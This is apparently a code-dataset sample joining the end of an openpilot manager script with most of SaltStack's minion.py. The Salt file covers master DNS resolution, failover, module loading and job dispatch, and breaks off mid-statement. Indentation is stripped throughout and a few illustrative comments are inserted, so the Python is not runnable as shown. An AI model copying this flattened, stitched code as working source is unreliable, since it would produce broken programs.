# IPowerManager.reboot(confirm=false, reason="recovery", wait=true)
android.reboot(reason="recovery")
def main():
os.environ['PARAMS_PATH'] = PARAMS
# the flippening!
os.system('LD_LIBRARY_PATH="" content insert --uri content://settings/system --bind name:s:user_rotation --bind value:i:1')
# disable bluetooth
os.system('service call bluetooth_manager 8')
params = Params()
params.manager_start()
default_params = [
("CommunityFeaturesToggle", "0"),
("CompletedTrainingVersion", "0"),
("IsRHD", "0"),
("IsMetric", "0"),
("RecordFront", "0"),
("HasAcceptedTerms", "0"),
("HasCompletedSetup", "0"),
("IsUploadRawEnabled", "1"),
("IsLdwEnabled", "1"),
("IsGeofenceEnabled", "-1"),
("SpeedLimitOffset", "0"),
("LongitudinalControl", "0"),
("LimitSetSpeed", "0"),
("LimitSetSpeedNeural", "0"),
("LastUpdateTime", datetime.datetime.utcnow().isoformat().encode('utf8')),
("OpenpilotEnabledToggle", "1"),
("LaneChangeEnabled", "1"),
("IsDriverViewEnabled", "0"),
]
# set unset params
for k, v in default_params:
if params.get(k) is None:
params.put(k, v)
# is this chffrplus?
if os.getenv("PASSIVE") is not None:
params.put("Passive", str(int(os.getenv("PASSIVE"))))
if params.get("Passive") is None:
raise Exception("Passive must be set to continue")
if ANDROID:
update_apks()
manager_init()
manager_prepare(spinner)
spinner.close()
if os.getenv("PREPAREONLY") is not None:
return
# SystemExit on sigterm
signal.signal(signal.SIGTERM, lambda signum, frame: sys.exit(1))
try:
manager_thread()
except Exception:
traceback.print_exc()
crash.capture_exception()
finally:
cleanup_all_processes(None, None)
if params.get("DoUninstall", encoding='utf8') == "1":
uninstall()
if __name__ == "__main__":
try:
main()
except Exception:
add_logentries_handler(cloudlog)
cloudlog.exception("Manager failed to start")
# Show last 3 lines of traceback
error = traceback.format_exc(3)
error = "Manager failed to start\n \n" + error
with TextWindow(error) as t:
t.wait_for_exit()
raise
# manual exit because we are forked
sys.exit(0)
|
minion.py
|
# -*- coding: utf-8 -*-
'''
Routines to set up a minion
'''
# Import python libs
from __future__ import absolute_import, print_function, with_statement
import os
import re
import sys
import copy
import time
import types
import signal
import fnmatch
import logging
import threading
import traceback
import contextlib
import multiprocessing
from random import randint, shuffle
from stat import S_IMODE
# Import Salt Libs
# pylint: disable=import-error,no-name-in-module,redefined-builtin
import salt.ext.six as six
if six.PY3:
import ipaddress
else:
import salt.ext.ipaddress as ipaddress
from salt.ext.six.moves import range
# pylint: enable=no-name-in-module,redefined-builtin
# Import third party libs
try:
import zmq
# TODO: cleanup
import zmq.eventloop.ioloop
# support pyzmq 13.0.x, TODO: remove once we force people to 14.0.x
if not hasattr(zmq.eventloop.ioloop, 'ZMQIOLoop'):
zmq.eventloop.ioloop.ZMQIOLoop = zmq.eventloop.ioloop.IOLoop
HAS_ZMQ = True
except ImportError:
# Running in local, zmq not needed
HAS_ZMQ = False
HAS_RANGE = False
try:
import seco.range
HAS_RANGE = True
except ImportError:
pass
HAS_PSUTIL = False
try:
import salt.utils.psutil_compat as psutil
HAS_PSUTIL = True
except ImportError:
pass
HAS_RESOURCE = False
try:
import resource
HAS_RESOURCE = True
except ImportError:
pass
try:
import zmq.utils.monitor
HAS_ZMQ_MONITOR = True
except ImportError:
HAS_ZMQ_MONITOR = False
# pylint: enable=import-error
# Import salt libs
import salt
import salt.client
import salt.crypt
import salt.loader
import salt.beacons
import salt.payload
import salt.syspaths
import salt.utils
import salt.utils.context
import salt.utils.jid
import salt.pillar
import salt.utils.args
import salt.utils.event
import salt.utils.minions
import salt.utils.schedule
import salt.utils.error
import salt.utils.zeromq
import salt.defaults.exitcodes
import salt.cli.daemons
import salt.log.setup
from salt.config import DEFAULT_MINION_OPTS
from salt.defaults import DEFAULT_TARGET_DELIM
from salt.executors import FUNCTION_EXECUTORS
from salt.utils.debug import enable_sigusr1_handler
from salt.utils.event import tagify
from salt.utils.process import default_signals, SignalHandlingMultiprocessingProcess
from salt.exceptions import (
CommandExecutionError,
CommandNotFoundError,
SaltInvocationError,
SaltReqTimeoutError,
SaltClientError,
SaltSystemExit,
SaltDaemonNotRunning
)
import tornado.gen # pylint: disable=F0401
import tornado.ioloop # pylint: disable=F0401
log = logging.getLogger(__name__)
# To set up a minion:
# 1. Read in the configuration
# 2. Generate the function mapping dict
# 3. Authenticate with the master
# 4. Store the AES key
# 5. Connect to the publisher
# 6. Handle publications
def resolve_dns(opts):
'''
Resolves the master_ip and master_uri options
'''
ret = {}
check_dns = True
if (opts.get('file_client', 'remote') == 'local' and
not opts.get('use_master_when_local', False)):
check_dns = False
if check_dns is True:
# Because I import salt.log below I need to re-import salt.utils here
import salt.utils
try:
if opts['master'] == '':
raise SaltSystemExit
ret['master_ip'] = \
salt.utils.dns_check(opts['master'], True, opts['ipv6'])
except SaltClientError:
if opts['retry_dns']:
while True:
import salt.log
msg = ('Master hostname: \'{0}\' not found. Retrying in {1} '
'seconds').format(opts['master'], opts['retry_dns'])
if salt.log.setup.is_console_configured():
log.error(msg)
else:
print('WARNING: {0}'.format(msg))
time.sleep(opts['retry_dns'])
try:
ret['master_ip'] = salt.utils.dns_check(
opts['master'], True, opts['ipv6']
)
break
except SaltClientError:
pass
else:
ret['master_ip'] = '127.0.0.1'
except SaltSystemExit:
unknown_str = 'unknown address'
master = opts.get('master', unknown_str)
if master == '':
master = unknown_str
if opts.get('__role') == 'syndic':
                err = 'Master address: \'{0}\' could not be resolved. Invalid or unresolvable address. Set \'syndic_master\' value in minion config.'.format(master)
            else:
                err = 'Master address: \'{0}\' could not be resolved. Invalid or unresolvable address. Set \'master\' value in minion config.'.format(master)
log.error(err)
raise SaltSystemExit(code=42, msg=err)
else:
ret['master_ip'] = '127.0.0.1'
if 'master_ip' in ret and 'master_ip' in opts:
if ret['master_ip'] != opts['master_ip']:
log.warning('Master ip address changed from {0} to {1}'.format(opts['master_ip'],
ret['master_ip'])
)
ret['master_uri'] = 'tcp://{ip}:{port}'.format(ip=ret['master_ip'],
port=opts['master_port'])
return ret
def prep_ip_port(opts):
ret = {}
if opts['master_uri_format'] == 'ip_only':
ret['master'] = opts['master']
else:
ip_port = opts['master'].rsplit(":", 1)
if len(ip_port) == 1:
# e.g. master: mysaltmaster
ret['master'] = ip_port[0]
else:
# e.g. master: localhost:1234
# e.g. master: 127.0.0.1:1234
# e.g. master: ::1:1234
ret['master'] = ip_port[0]
ret['master_port'] = ip_port[1]
return ret
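def _prep_ip_port_example():
    '''
    Illustrative sketch (not part of upstream Salt): shows the shapes
    prep_ip_port() is expected to return for the comment cases above,
    e.g. {'master': 'mysaltmaster'} for a bare hostname and
    {'master': '127.0.0.1', 'master_port': '1234'} when a port is appended.
    The opts dicts below are minimal assumptions, not real minion configs.
    '''
    bare = prep_ip_port({'master_uri_format': 'default', 'master': 'mysaltmaster'})
    with_port = prep_ip_port({'master_uri_format': 'default', 'master': '127.0.0.1:1234'})
    return bare, with_port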
def get_proc_dir(cachedir, **kwargs):
'''
Given the cache directory, return the directory that process data is
stored in, creating it if it doesn't exist.
The following optional Keyword Arguments are handled:
    mode: which is anything os.makedirs would accept as mode.
uid: the uid to set, if not set, or it is None or -1 no changes are
made. Same applies if the directory is already owned by this
uid. Must be int. Works only on unix/unix like systems.
gid: the gid to set, if not set, or it is None or -1 no changes are
made. Same applies if the directory is already owned by this
gid. Must be int. Works only on unix/unix like systems.
'''
fn_ = os.path.join(cachedir, 'proc')
mode = kwargs.pop('mode', None)
if mode is None:
mode = {}
else:
mode = {'mode': mode}
if not os.path.isdir(fn_):
# proc_dir is not present, create it with mode settings
os.makedirs(fn_, **mode)
d_stat = os.stat(fn_)
# if mode is not an empty dict then we have an explicit
# dir mode. So lets check if mode needs to be changed.
if mode:
mode_part = S_IMODE(d_stat.st_mode)
if mode_part != mode['mode']:
os.chmod(fn_, (d_stat.st_mode ^ mode_part) | mode['mode'])
if hasattr(os, 'chown'):
# only on unix/unix like systems
uid = kwargs.pop('uid', -1)
gid = kwargs.pop('gid', -1)
# if uid and gid are both -1 then go ahead with
# no changes at all
if (d_stat.st_uid != uid or d_stat.st_gid != gid) and \
[i for i in (uid, gid) if i != -1]:
os.chown(fn_, uid, gid)
return fn_
def parse_args_and_kwargs(func, args, data=None):
'''
Wrap load_args_and_kwargs
'''
salt.utils.warn_until(
'Boron',
'salt.minion.parse_args_and_kwargs() has been renamed to '
'salt.minion.load_args_and_kwargs(). Please change this function call '
'before the Boron release of Salt.'
)
return load_args_and_kwargs(func, args, data=data)
def load_args_and_kwargs(func, args, data=None, ignore_invalid=False):
'''
Detect the args and kwargs that need to be passed to a function call, and
check them against what was passed.
'''
argspec = salt.utils.args.get_function_argspec(func)
_args = []
_kwargs = {}
invalid_kwargs = []
for arg in args:
if isinstance(arg, six.string_types):
string_arg, string_kwarg = salt.utils.args.parse_input([arg], condition=False) # pylint: disable=W0632
if string_arg:
# Don't append the version that was just derived from parse_cli
# above, that would result in a 2nd call to
# salt.utils.cli.yamlify_arg(), which could mangle the input.
_args.append(arg)
elif string_kwarg:
salt.utils.warn_until(
'Boron',
'The list of function args and kwargs should be parsed '
'by salt.utils.args.parse_input() before calling '
'salt.minion.load_args_and_kwargs().'
)
if argspec.keywords or next(six.iterkeys(string_kwarg)) in argspec.args:
# Function supports **kwargs or is a positional argument to
# the function.
_kwargs.update(string_kwarg)
else:
# **kwargs not in argspec and parsed argument name not in
# list of positional arguments. This keyword argument is
# invalid.
for key, val in six.iteritems(string_kwarg):
invalid_kwargs.append('{0}={1}'.format(key, val))
continue
# if the arg is a dict with __kwarg__ == True, then its a kwarg
elif isinstance(arg, dict) and arg.pop('__kwarg__', False) is True:
for key, val in six.iteritems(arg):
if argspec.keywords or key in argspec.args:
# Function supports **kwargs or is a positional argument to
# the function.
_kwargs[key] = val
else:
# **kwargs not in argspec and parsed argument name not in
# list of positional arguments. This keyword argument is
# invalid.
invalid_kwargs.append('{0}={1}'.format(key, val))
continue
else:
_args.append(arg)
if invalid_kwargs and not ignore_invalid:
salt.utils.invalid_kwargs(invalid_kwargs)
if argspec.keywords and isinstance(data, dict):
# this function accepts **kwargs, pack in the publish data
for key, val in six.iteritems(data):
_kwargs['__pub_{0}'.format(key)] = val
return _args, _kwargs
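# Hedged sketch (illustrative only): with a function like
#     def example(host, port=4505, **kwargs): ...
# load_args_and_kwargs(example, ['saltmaster', {'__kwarg__': True, 'port': 4506}])
# is expected to yield (['saltmaster'], {'port': 4506}), while an unknown keyword
# on a function without **kwargs would be collected into invalid_kwargs instead.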
class MinionBase(object):
def __init__(self, opts):
self.opts = opts
@staticmethod
def process_schedule(minion, loop_interval):
try:
minion.schedule.eval()
# Check if scheduler requires lower loop interval than
# the loop_interval setting
if minion.schedule.loop_interval < loop_interval:
loop_interval = minion.schedule.loop_interval
log.debug(
'Overriding loop_interval because of scheduled jobs.'
)
except Exception as exc:
log.error(
'Exception {0} occurred in scheduled job'.format(exc)
)
return loop_interval
def process_beacons(self, functions):
'''
Evaluate all of the configured beacons, grab the config again in case
the pillar or grains changed
'''
if 'config.merge' in functions:
b_conf = functions['config.merge']('beacons')
if b_conf:
return self.beacons.process(b_conf) # pylint: disable=no-member
return []
@tornado.gen.coroutine
def eval_master(self,
opts,
timeout=60,
safe=True,
failed=False):
'''
Evaluates and returns a tuple of the current master address and the pub_channel.
In standard mode, just creates a pub_channel with the given master address.
With master_type=func evaluates the current master address from the given
module and then creates a pub_channel.
With master_type=failover takes the list of masters and loops through them.
The first one that allows the minion to create a pub_channel is then
        returned. If this function is called outside the minion's initialization
        phase (for example from the minion's main event-loop when a master connection
        loss was detected), 'failed' should be set to True. The current
        (possibly failed) master will then be removed from the list of masters.
'''
# check if master_type was altered from its default
if opts['master_type'] != 'str' and opts['__role'] != 'syndic':
# check for a valid keyword
if opts['master_type'] == 'func':
# split module and function and try loading the module
mod, fun = opts['master'].split('.')
try:
master_mod = salt.loader.raw_mod(opts, mod, fun)
if not master_mod:
raise TypeError
# we take whatever the module returns as master address
opts['master'] = master_mod[mod + '.' + fun]()
except TypeError:
msg = ('Failed to evaluate master address from '
'module \'{0}\''.format(opts['master']))
log.error(msg)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
log.info('Evaluated master from module: {0}'.format(master_mod))
# if failover is set, master has to be of type list
elif opts['master_type'] == 'failover':
if isinstance(opts['master'], list):
log.info('Got list of available master addresses:'
' {0}'.format(opts['master']))
if opts['master_shuffle']:
shuffle(opts['master'])
# if opts['master'] is a str and we have never created opts['master_list']
elif isinstance(opts['master'], str) and ('master_list' not in opts):
# We have a string, but a list was what was intended. Convert.
# See issue 23611 for details
opts['master'] = [opts['master']]
elif opts['__role'] == 'syndic':
log.info('Syndic setting master_syndic to \'{0}\''.format(opts['master']))
# if failed=True, the minion was previously connected
                # we're probably called from the minion's main event-loop
# because a master connection loss was detected. remove
# the possibly failed master from the list of masters.
elif failed:
log.info('Removing possibly failed master {0} from list of'
' masters'.format(opts['master']))
# create new list of master with the possibly failed one removed
opts['master'] = [x for x in opts['master_list'] if opts['master'] != x]
else:
msg = ('master_type set to \'failover\' but \'master\' '
'is not of type list but of type '
'{0}'.format(type(opts['master'])))
log.error(msg)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
                # If failover is set, minions have to fail over on DNS errors instead of retrying DNS resolution.
# See issue 21082 for details
if opts['retry_dns']:
msg = ('\'master_type\' set to \'failover\' but \'retry_dns\' is not 0. '
'Setting \'retry_dns\' to 0 to failover to the next master on DNS errors.')
log.critical(msg)
opts['retry_dns'] = 0
else:
msg = ('Invalid keyword \'{0}\' for variable '
'\'master_type\''.format(opts['master_type']))
log.error(msg)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
# Specify kwargs for the channel factory so that SMinion doesn't need to define an io_loop
# (The channel factories will set a default if the kwarg isn't passed)
factory_kwargs = {'timeout': timeout, 'safe': safe}
if getattr(self, 'io_loop', None):
factory_kwargs['io_loop'] = self.io_loop # pylint: disable=no-member
# if we have a list of masters, loop through them and be
# happy with the first one that allows us to connect
if isinstance(opts['master'], list):
conn = False
            # loop through a local copy of the master list (shuffled earlier if
            # master_shuffle is set) and use the first one we can connect to
local_masters = copy.copy(opts['master'])
for master in local_masters:
opts['master'] = master
opts.update(prep_ip_port(opts))
opts.update(resolve_dns(opts))
self.opts = opts
# on first run, update self.opts with the whole master list
# to enable a minion to re-use old masters if they get fixed
if 'master_list' not in opts:
opts['master_list'] = local_masters
try:
pub_channel = salt.transport.client.AsyncPubChannel.factory(opts, **factory_kwargs)
yield pub_channel.connect()
conn = True
break
except SaltClientError:
msg = ('Master {0} could not be reached, trying '
'next master (if any)'.format(opts['master']))
log.info(msg)
continue
if not conn:
self.connected = False
                msg = ('No master could be reached or all masters denied '
                       'the minion\'s connection attempt.')
log.error(msg)
else:
self.tok = pub_channel.auth.gen_token('salt')
self.connected = True
raise tornado.gen.Return((opts['master'], pub_channel))
# single master sign in
else:
opts.update(prep_ip_port(opts))
opts.update(resolve_dns(opts))
pub_channel = salt.transport.client.AsyncPubChannel.factory(self.opts, **factory_kwargs)
yield pub_channel.connect()
self.tok = pub_channel.auth.gen_token('salt')
self.connected = True
raise tornado.gen.Return((opts['master'], pub_channel))
class SMinion(MinionBase):
'''
Create an object that has loaded all of the minion module functions,
grains, modules, returners etc. The SMinion allows developers to
generate all of the salt minion functions and present them with these
functions for general use.
'''
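    # A minimal usage sketch (illustrative; the config path and function name
    # are assumptions, not taken from this file):
    #
    #   opts = salt.config.minion_config('/etc/salt/minion')
    #   sminion = SMinion(opts)
    #   result = sminion.functions['test.ping']()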
def __init__(self, opts):
# Late setup of the opts grains, so we can log from the grains module
opts['grains'] = salt.loader.grains(opts)
super(SMinion, self).__init__(opts)
        # Connect to a master when the remote file client is in use (or when
        # use_master_when_local is set), so remote requests can be served
if (self.opts.get('file_client', 'remote') == 'remote'
or self.opts.get('use_master_when_local', False)):
self.eval_master(self.opts, failed=True)
self.gen_modules(initial_load=True)
def gen_modules(self, initial_load=False):
'''
Load all of the modules for the minion
'''
self.opts['pillar'] = salt.pillar.get_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['environment'],
pillarenv=self.opts.get('pillarenv'),
).compile_pillar()
self.utils = salt.loader.utils(self.opts)
self.functions = salt.loader.minion_mods(self.opts, utils=self.utils,
include_errors=True)
self.returners = salt.loader.returners(self.opts, self.functions)
self.proxy = salt.loader.proxy(self.opts, self.functions, self.returners, None)
# TODO: remove
self.function_errors = {} # Keep the funcs clean
self.states = salt.loader.states(self.opts, self.functions, self.utils)
self.rend = salt.loader.render(self.opts, self.functions)
self.matcher = Matcher(self.opts, self.functions)
self.functions['sys.reload_modules'] = self.gen_modules
self.executors = salt.loader.executors(self.opts)
class MasterMinion(object):
'''
Create a fully loaded minion function object for generic use on the
    master. What makes this class different is that the pillar is
    omitted; otherwise everything else is loaded cleanly.
'''
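    # A hedged usage sketch; master_opts is assumed to come from
    # salt.config.master_config() and must carry 'conf_file':
    #
    #   mminion = MasterMinion(master_opts)
    #   mminion.functions['saltutil.sync_all']()   # illustrative function name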
def __init__(
self,
opts,
returners=True,
states=True,
rend=True,
matcher=True,
whitelist=None):
self.opts = salt.config.minion_config(opts['conf_file'])
self.opts.update(opts)
self.whitelist = whitelist
self.opts['grains'] = salt.loader.grains(opts)
self.opts['pillar'] = {}
self.mk_returners = returners
self.mk_states = states
self.mk_rend = rend
self.mk_matcher = matcher
self.gen_modules(initial_load=True)
def gen_modules(self, initial_load=False):
'''
Load all of the modules for the minion
'''
self.utils = salt.loader.utils(self.opts)
self.functions = salt.loader.minion_mods(
self.opts,
utils=self.utils,
whitelist=self.whitelist,
initial_load=initial_load)
if self.mk_returners:
self.returners = salt.loader.returners(self.opts, self.functions)
if self.mk_states:
self.states = salt.loader.states(self.opts,
self.functions,
self.utils)
if self.mk_rend:
self.rend = salt.loader.render(self.opts, self.functions)
if self.mk_matcher:
self.matcher = Matcher(self.opts, self.functions)
self.functions['sys.reload_modules'] = self.gen_modules
class MultiMinion(MinionBase):
'''
    Create a multi-minion interface; this creates as many minions as are
    defined in the master option and binds each minion object to a respective
    master.
'''
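    # A hedged config sketch (minion YAML); 'master' must be a list or
    # _spawn_minions() below will exit:
    #
    #   master:
    #     - master1.example.com
    #     - master2.example.com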
# timeout for one of the minions to auth with a master
MINION_CONNECT_TIMEOUT = 5
def __init__(self, opts):
super(MultiMinion, self).__init__(opts)
self.auth_wait = self.opts['acceptance_wait_time']
self.max_auth_wait = self.opts['acceptance_wait_time_max']
zmq.eventloop.ioloop.install()
self.io_loop = zmq.eventloop.ioloop.ZMQIOLoop()
def _spawn_minions(self):
'''
Spawn all the coroutines which will sign in to masters
'''
if not isinstance(self.opts['master'], list):
log.error(
'Attempting to start a multimaster system with one master')
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
for master in set(self.opts['master']):
s_opts = copy.deepcopy(self.opts)
s_opts['master'] = master
s_opts['multimaster'] = True
s_opts['auth_timeout'] = self.MINION_CONNECT_TIMEOUT
self.io_loop.spawn_callback(self._connect_minion, s_opts)
@tornado.gen.coroutine
def _connect_minion(self, opts):
'''
Create a minion, and asynchronously connect it to a master
'''
last = 0 # never have we signed in
auth_wait = opts['acceptance_wait_time']
while True:
try:
minion = Minion(opts,
self.MINION_CONNECT_TIMEOUT,
False,
io_loop=self.io_loop,
loaded_base_name='salt.loader.{0}'.format(opts['master']),
)
yield minion.connect_master()
minion.tune_in(start=False)
break
except SaltClientError as exc:
log.error('Error while bringing up minion for multi-master. Is master at {0} responding?'.format(opts['master']))
last = time.time()
if auth_wait < self.max_auth_wait:
auth_wait += self.auth_wait
yield tornado.gen.sleep(auth_wait) # TODO: log?
except Exception as e:
log.critical('Unexpected error while connecting to {0}'.format(opts['master']), exc_info=True)
# Multi Master Tune In
def tune_in(self):
'''
Bind to the masters
This loop will attempt to create connections to masters it hasn't connected
to yet, but once the initial connection is made it is up to ZMQ to do the
reconnect (don't know of an API to get the state here in salt)
'''
# Fire off all the minion coroutines
self.minions = self._spawn_minions()
# serve forever!
self.io_loop.start()
class Minion(MinionBase):
'''
This class instantiates a minion, runs connections for a minion,
and loads all of the functions into the minion
'''
def __init__(self, opts, timeout=60, safe=True, loaded_base_name=None, io_loop=None): # pylint: disable=W0231
'''
Pass in the options dict
'''
# this means that the parent class doesn't know *which* master we connect to
super(Minion, self).__init__(opts)
self.timeout = timeout
self.safe = safe
self._running = None
self.win_proc = []
self.loaded_base_name = loaded_base_name
if io_loop is None:
zmq.eventloop.ioloop.install()
self.io_loop = zmq.eventloop.ioloop.ZMQIOLoop()
else:
self.io_loop = io_loop
# Warn if ZMQ < 3.2
if HAS_ZMQ:
try:
zmq_version_info = zmq.zmq_version_info()
except AttributeError:
# PyZMQ <= 2.1.9 does not have zmq_version_info, fall back to
# using zmq.zmq_version() and build a version info tuple.
zmq_version_info = tuple(
[int(x) for x in zmq.zmq_version().split('.')] # pylint: disable=no-member
)
if zmq_version_info < (3, 2):
log.warning(
'You have a version of ZMQ less than ZMQ 3.2! There are '
'known connection keep-alive issues with ZMQ < 3.2 which '
'may result in loss of contact with minions. Please '
'upgrade your ZMQ!'
)
        # Late setup of the opts grains, so we can log from the grains
# module. If this is a proxy, however, we need to init the proxymodule
# before we can get the grains.
if not salt.utils.is_proxy():
self.opts['grains'] = salt.loader.grains(opts)
def sync_connect_master(self, timeout=None):
'''
Block until we are connected to a master
'''
self._sync_connect_master_success = False
log.debug("sync_connect_master")
def on_connect_master_future_done(future):
self._sync_connect_master_success = True
self.io_loop.stop()
self._connect_master_future = self.connect_master()
# finish connecting to master
self._connect_master_future.add_done_callback(on_connect_master_future_done)
if timeout:
self.io_loop.call_later(timeout, self.io_loop.stop)
self.io_loop.start()
# I made the following 3 line oddity to preserve traceback.
# Please read PR #23978 before changing, hopefully avoiding regressions.
# Good luck, we're all counting on you. Thanks.
future_exception = self._connect_master_future.exc_info()
if future_exception:
raise six.reraise(*future_exception)
if timeout and self._sync_connect_master_success is False:
raise SaltDaemonNotRunning('Failed to connect to the salt-master')
@tornado.gen.coroutine
def connect_master(self):
'''
Return a future which will complete when you are connected to a master
'''
master, self.pub_channel = yield self.eval_master(self.opts, self.timeout, self.safe)
yield self._post_master_init(master)
# TODO: better name...
@tornado.gen.coroutine
def _post_master_init(self, master):
'''
Function to finish init after connecting to a master
This is primarily loading modules, pillars, etc. (since they need
to know which master they connected to)
'''
self.opts['master'] = master
self.opts['pillar'] = yield salt.pillar.get_async_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['environment'],
pillarenv=self.opts.get('pillarenv')
).compile_pillar()
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
self.serial = salt.payload.Serial(self.opts)
self.mod_opts = self._prep_mod_opts()
self.matcher = Matcher(self.opts, self.functions)
self.beacons = salt.beacons.Beacon(self.opts, self.functions)
uid = salt.utils.get_uid(user=self.opts.get('user', None))
self.proc_dir = get_proc_dir(self.opts['cachedir'], uid=uid)
self.schedule = salt.utils.schedule.Schedule(
self.opts,
self.functions,
self.returners)
        # add default scheduling jobs to the minion's scheduler
if self.opts['mine_enabled'] and 'mine.update' in self.functions:
self.schedule.add_job({
'__mine_interval':
{
'function': 'mine.update',
'minutes': self.opts['mine_interval'],
'jid_include': True,
'maxrunning': 2,
'return_job': self.opts.get('mine_return_job', False)
}
}, persist=True)
log.info('Added mine.update to scheduler')
else:
self.schedule.delete_job('__mine_interval', persist=True)
# add master_alive job if enabled
if self.opts['master_alive_interval'] > 0:
self.schedule.add_job({
'__master_alive':
{
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
}, persist=True)
self.grains_cache = self.opts['grains']
def _return_retry_timer(self):
'''
Based on the minion configuration, either return a randomized timer or
just return the value of the return_retry_timer.
'''
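        # A hedged config sketch (minion YAML); with return_retry_timer_max set
        # a value is picked at random from the closed range below, otherwise
        # return_retry_timer is used as-is:
        #
        #   return_retry_timer: 5
        #   return_retry_timer_max: 10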
msg = 'Minion return retry timer set to {0} seconds'
if self.opts.get('return_retry_timer_max'):
try:
random_retry = randint(self.opts['return_retry_timer'], self.opts['return_retry_timer_max'])
log.debug(msg.format(random_retry) + ' (randomized)')
return random_retry
except ValueError:
# Catch wiseguys using negative integers here
log.error(
                    'Invalid value (return_retry_timer: {0} or return_retry_timer_max: {1}); '
                    'both must be positive integers'.format(
self.opts['return_retry_timer'],
self.opts['return_retry_timer_max'],
)
)
log.debug(msg.format(DEFAULT_MINION_OPTS['return_retry_timer']))
return DEFAULT_MINION_OPTS['return_retry_timer']
else:
log.debug(msg.format(self.opts.get('return_retry_timer')))
return self.opts.get('return_retry_timer')
def _prep_mod_opts(self):
'''
Returns a copy of the opts with key bits stripped out
'''
mod_opts = {}
for key, val in six.iteritems(self.opts):
if key == 'logger':
continue
mod_opts[key] = val
return mod_opts
def _process_beacons(self):
'''
Process each beacon and send events if appropriate
'''
# Process Beacons
try:
beacons = self.process_beacons(self.functions)
except Exception as exc:
            log.critical('Beacon processing failed: {0}. No beacons will be processed.'.format(traceback.format_exc()))
beacons = None
if beacons:
self._fire_master(events=beacons)
for beacon in beacons:
serialized_data = salt.utils.dicttrim.trim_dict(
self.serial.dumps(beacon['data']),
self.opts.get('max_event_size', 1048576),
is_msgpacked=True,
)
log.debug('Sending event - data = {0}'.format(beacon['data']))
event = '{0}{1}{2}'.format(
beacon['tag'],
salt.utils.event.TAGEND,
serialized_data,
)
self.event_publisher.handle_publish([event])
def _load_modules(self, force_refresh=False, notify=False, proxy=None):
'''
Return the functions and the returners loaded up from the loader
module
'''
# if this is a *nix system AND modules_max_memory is set, lets enforce
# a memory limit on module imports
# this feature ONLY works on *nix like OSs (resource module doesn't work on windows)
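        # A hedged config sketch (minion YAML); the value is in bytes and is
        # added on top of the current RSS + VMS of this process below:
        #
        #   modules_max_memory: 500000000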
modules_max_memory = False
if self.opts.get('modules_max_memory', -1) > 0 and HAS_PSUTIL and HAS_RESOURCE:
log.debug('modules_max_memory set, enforcing a maximum of {0}'.format(self.opts['modules_max_memory']))
modules_max_memory = True
old_mem_limit = resource.getrlimit(resource.RLIMIT_AS)
rss, vms = psutil.Process(os.getpid()).memory_info()
mem_limit = rss + vms + self.opts['modules_max_memory']
resource.setrlimit(resource.RLIMIT_AS, (mem_limit, mem_limit))
elif self.opts.get('modules_max_memory', -1) > 0:
if not HAS_PSUTIL:
log.error('Unable to enforce modules_max_memory because psutil is missing')
if not HAS_RESOURCE:
log.error('Unable to enforce modules_max_memory because resource is missing')
self.opts['grains'] = salt.loader.grains(self.opts, force_refresh)
self.utils = salt.loader.utils(self.opts)
if self.opts.get('multimaster', False):
s_opts = copy.deepcopy(self.opts)
functions = salt.loader.minion_mods(s_opts, utils=self.utils, proxy=proxy,
loaded_base_name=self.loaded_base_name, notify=notify)
else:
functions = salt.loader.minion_mods(self.opts, utils=self.utils, notify=notify, proxy=proxy)
returners = salt.loader.returners(self.opts, functions)
errors = {}
if '_errors' in functions:
errors = functions['_errors']
functions.pop('_errors')
# we're done, reset the limits!
if modules_max_memory is True:
resource.setrlimit(resource.RLIMIT_AS, old_mem_limit)
executors = salt.loader.executors(self.opts, functions)
return functions, returners, errors, executors
def _fire_master(self, data=None, tag=None, events=None, pretag=None, timeout=60):
'''
Fire an event on the master, or drop message if unable to send.
'''
load = {'id': self.opts['id'],
'cmd': '_minion_event',
'pretag': pretag,
'tok': self.tok}
if events:
load['events'] = events
elif data and tag:
load['data'] = data
load['tag'] = tag
elif not data and tag:
load['data'] = {}
load['tag'] = tag
else:
return
channel = salt.transport.Channel.factory(self.opts)
try:
result = channel.send(load, timeout=timeout)
return True
except Exception:
log.info('fire_master failed: {0}'.format(traceback.format_exc()))
return False
def _handle_decoded_payload(self, data):
'''
Override this method if you wish to handle the decoded data
differently.
'''
if 'user' in data:
log.info(
'User {0[user]} Executing command {0[fun]} with jid '
'{0[jid]}'.format(data)
)
else:
log.info(
'Executing command {0[fun]} with jid {0[jid]}'.format(data)
)
log.debug('Command details {0}'.format(data))
if isinstance(data['fun'], six.string_types):
if data['fun'] == 'sys.reload_modules':
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
self.schedule.functions = self.functions
self.schedule.returners = self.returners
        # We stash an instance reference to allow for the socket
# communication in Windows. You can't pickle functions, and thus
# python needs to be able to reconstruct the reference on the other
# side.
instance = self
multiprocessing_enabled = self.opts.get('multiprocessing', True)
if multiprocessing_enabled:
if sys.platform.startswith('win'):
# let python reconstruct the minion on the other side if we're
# running on windows
instance = None
process = SignalHandlingMultiprocessingProcess(
target=self._target, args=(instance, self.opts, data)
)
else:
process = threading.Thread(
target=self._target,
args=(instance, self.opts, data),
name=data['jid']
)
if multiprocessing_enabled:
with default_signals(signal.SIGINT, signal.SIGTERM):
# Reset current signals before starting the process in
# order not to inherit the current signal handlers
process.start()
else:
process.start()
# TODO: remove the windows specific check?
if multiprocessing_enabled and not salt.utils.is_windows():
# we only want to join() immediately if we are daemonizing a process
process.join()
else:
self.win_proc.append(process)
def ctx(self):
'''Return a single context manager for the minion's data
'''
return contextlib.nested(
self.functions.context_dict.clone(),
self.returners.context_dict.clone(),
self.executors.context_dict.clone(),
)
@classmethod
def _target(cls, minion_instance, opts, data):
with tornado.stack_context.StackContext(minion_instance.ctx):
if isinstance(data['fun'], tuple) or isinstance(data['fun'], list):
Minion._thread_multi_return(minion_instance, opts, data)
else:
Minion._thread_return(minion_instance, opts, data)
@classmethod
def _thread_return(cls, minion_instance, opts, data):
'''
This method should be used as a threading target, start the actual
minion side execution.
'''
# this seems awkward at first, but it's a workaround for Windows
# multiprocessing communication.
if sys.platform.startswith('win') and \
